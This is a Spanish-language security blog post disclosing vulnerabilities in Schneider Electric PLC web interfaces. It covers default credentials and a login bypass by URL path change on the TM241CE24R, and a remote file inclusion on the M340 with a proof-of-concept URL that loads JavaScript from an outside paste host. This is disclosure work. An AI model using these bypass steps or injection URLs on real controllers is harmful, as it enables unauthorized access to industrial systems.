jueves, 10 de noviembre de 2016

MÚLTIPLES VULNERABILIDADES ( ICS ) - SCHNEIDER ELECTRIC - 2

Continuando con el articulo anterior en donde dentro del mundo de las ICS, me centro en los PLC.
Sin mas preámbulos ahora llega el turno de  presentar algunas de sus vulnerabilidades detectadas.




Vulnerabilidades detectadas: 
vendor: Schneider Electric

BYPASS LOGIN FORM


Device: TM241CE24R  ( m241 )

Manual-pdf 

CAD: http://www.tracepartsonline.net/(S(ldnjvdybvfeogwc4hri4rro4))/partdetails.aspx?Class=SCHNEIDER_ELECTRIC&ACPD=1&FPartTab=VW3D&FPartTabsToH=PROD|DOCS|TDOCS|VW2D&PartFamilyID=10-03062014-103053&PartID=10-03062014-103053&sk_Reference=TM241CE24R
TM241.jpg
Este modelo (como la mayoría) cuenta con un servicio web embebido, corriendo por defecto en el puerto 80. Instantáneamente cuando uno accede a la aplicación web, automáticamente se encuentra con un login form. 

Lo cual esta perfecto, salvo por un par de interesantes curiosidades:

Al margen de que en la gran mayoría de los casos  encontrados(100 % en mi caso), las credenciales serán las del manual. 'USER:USER'

Cuando tenemos de frente al formulario, el 'username' ya esta escrito. Esto es fatal, el posible atacante ya tiene parte del trabajo resuelto.


Pero pongamos por caso que justo nos topamos con dispositivo de estos con el password cambiado.
Cuando intentemos y fracasamos...

El mecanismo que un atcante tiene para evadir este sistema de seguridad es tan simple como cambiar el path de la url. de '/login.htm' a '/index2.htm'. Y estamos adentro..., Con todo lo que ello implica.



REMOTE FILE INCLUSION

Ahora cambiamos de PLC y pasamos al Modelo M340. Ahora con su aplicación web vulnerable a RFI.



Un RFI trata sobre sobre aplicaciones web que permiten la inclusión de archivos situados en servidores remotos. La vulnerabilidad radica en la posibilidad de incluir archivos contenidos en aplicaciones web controladas por algún atacante, dando la posibilidad de ejecutar código malicioso en la app vulnerable.

Se explota modificando la URL apuntando a archivos remotos.

Paths vulnerable:
http://<ip-PLC>/html/english/home/index.htm?<RFI>

POC1: 
Web con código JS: http://paste.c99.nl/faef903ef5369657240e.html

code JS:  alert('[ [ POC ] \n malicious code JS');

http://<PLC>/html/english/home/index.htm?http://paste.c99.nl/faef903ef5369657240e.html


Pero tmb


y que su imaginación vuele...



Saludos,
@Capitan_Alfa

No hay comentarios.:

Publicar un comentario